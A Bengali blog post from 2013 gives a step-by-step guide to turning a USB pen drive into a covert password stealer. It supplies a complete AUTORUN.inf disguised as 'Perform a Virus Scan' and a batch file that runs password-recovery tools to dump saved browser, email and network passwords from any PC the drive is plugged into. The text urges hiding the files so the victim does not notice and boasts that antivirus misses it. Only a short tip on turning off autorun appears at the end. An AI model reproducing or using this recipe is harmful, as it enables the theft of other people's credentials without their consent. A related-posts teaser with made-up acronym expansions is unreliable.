Monday, July 15, 2013

হ্যাকিং বিষয়ে চুলকানি থাকলে দূরে থাকুন।

আজকাল সবার কাছেই পেনড্রাইভ আছে বলা যায়। একজনের পিসি থেকে আরেক জনের পিসিতে অবাধে বিচরন করছে এই পেনড্রাইভ। আর এই পেনড্রাইভকেই ব্যবহার করতে পারেন হ্যাকিং এর ছোট হাতিয়ার হিসেবে।:P শুধু পেনড্রাইভই নয় মেমরি কার্ড দিয়েও একই কাজ করা সম্ভব! তাহলে চলুন শুরু করা যাক।



প্রথমে দুইটা ফাইল বানাতে হবে। নাম ধরেন AUTORUN এবং LAUNCH।
একটা নোট প্যাড খুলুন। তারপর টাইপ করুন

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

এখন সেভ করুন AUTORUN.inf নামে।

আবার নোট প্যাড খুলুন। তারপর টাইপ করুন

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

এখন সেভ করুন LAUNCH.bat নামে। আপনি আপনার মতো কাস্টোমাইজও করে নিতে পারেন।

এখন এই সাইটে যান।
এখানে থেকে আপনার প্রয়োজনীয় সফটওয়্যার ডাউনলোড করে নিতে পারেন।

এত ঝামেলা না করতে চাইলে সরাসরি এখান থেকে এই ফাইলটি ডাউনলোড করে নিন। তারপর Extract করে ফোল্ডারের সব ফাইলগুলো আপনার পেনড্রাইভে কপি করুন। বলা যায় আপনার কাজ শেষ।

এখন এই পেনড্রাইভ যে কারও পিসিতে প্রবেশ করালেই পেয়ে যাবেন সব সেভ করা পাসওয়ার্ড!
**শর্ত প্রযোজ্য :P

যার পিসিতে প্রবেশ করাবেন তার AUTORUN অফ করা থাকলে সরাসরি কাজ করবে না। তবে আপনি যদি সুযোগ বুঝে LAUNCH নামক ফাইলটি ডাবল ক্লিক করে ওপেন করে ফেলেন তাহলেই কেল্লা ফতে! আর যদি AUTORUN অফ না করা থাকে তাহলেতো আর কিছুই করা লাগবে না। অটো সব পাসওয়ার্ড হ্যাক হয়ে যাবে। :D
আর মজার কথা হলো AUTORUN ফাইলটা ছাড়া আর কোন ফাইল এন্টিভাইরাস ধরতে পারবে না। তাই নির্ভয়ে হ্যাক চালিয়ে যেতে পারবেন। ;)

কিভাবে হ্যাক করা পাসওয়ার্ডগুলো দেখবেন? খুব সহজ! আপনার পেনড্রাইভ ফোল্ডারে দেখুন
WebBrowserPassView নামসহ কিছু টেক্সট ফাইল তৈরি হয়েছে। সব পাসওয়ার্ড এই টেক্সট ফাইলেই পাবেন। এভাবে আপনি Internet Explorer, Mozilla Firefox (All Versions), Google Chrome, and Opera এর সব সেভ করা পাসওয়ার্ড হাতিয়ে নিতে পারবেন। :mrgreen:

**সতর্কতা স্বরুপ আপনি ফাইলগুলো হিডেন করে রাখতে পারেন। যাতে ভিক্টিম বুঝতে না পারে।** ;) :P

কিভাবে বাচবেন এমন হ্যাকারের হাত থেকে? তেমন কিছু না।
AUTORUN অফ করে রাখুন+ মাস্টার পাসওয়ার্ড ব্যবহার করুন। মজিলার Tools -> Options -> Security / Passwords -> Use a master password কাজ শেষ!

আশা করি আপনাদের ভাল লেগেছে।
ধন্যবাদ সবাইকে।

Related Posts:

  • ভালো থাকার সুযোগ বেশি দেশে, বিদেশে নয় সন্তানের উন্নত জীবন চান?—তাহলে বিদেশে না পাঠিয়ে সন্তানকে দেশে থাকার জন্য উদ্বুদ্ধ করুন। কারণ, বাংলাদেশের ৭১ শতাংশ মানুষই এখন উন্নত জীবনের জন্য বিদেশের পরিবর্তে সন্তানকে দেশে থাকতে বলবেন। কারণ, তাঁরা মনে করেন, পরবর্তী প্র… Read More
  • How to know your Mobile Phone number Tips: 01. Airtel : Know For Own Number : Dial *121*6*3#Know For Current Package : Dial *121*1*1*1#02. Banglalink : Know For Own Number : Dial *511#Know For Current Package : Dial *125#03. GrameenPhone : Know For Own Number : Dia… Read More
  • ঢাবি ‘ক’ ইউনিটের ভর্তি পরীক্ষার ফলাফল প্রকাশ ঢাকা বিশ্ববিদ্যালয়ের বিজ্ঞান অনুষদের অধীন ‘ক’ ইউনিটের ভর্তি পরীক্ষার ফলাফল প্রকাশ করা হয়েছে। মোট ৭৮ হাজার ২শ’ ৯৩ জন শিক্ষার্থী এ পরীক্ষায় অংশগ্রহণ করেন। প্রকাশিত ফলাফলে ২১ দশমিক ৫০ শতাংশ পাসের হারে মোট ১৬ হাজার ৮শ’ ৪০ জ… Read More
  • মসল্লার বাংলা এবং English Name : Allspice = কাবাব চিনি।  Asafoetida = হিং।  Bay Leaf = তেজ পাতা।  Black Cardamom = বড় এলাচ।  Black Cumin = কালো জিরা। Black Pepper = গোল মরিচ।  Black Salt = কালো নুন।  Brown Musta… Read More
  • Full Meaning of Word 1.) GOOGLE - Global Organization Of Oriented Group Language Of Earth. 2.) YAHOO - Yet Another Hierarchical Officious Oracle. 3.) WINDOW - Wide Interactive NetworkDevelopment for Office work Solution.4.) COMPUTER - Common Ori… Read More

0 comments:

Marque slider

আপনাকে FreeTalk এ স্বাগতম Thank you for come Here

FreeTalk. Powered by Blogger.

Popular Posts

Blog Archive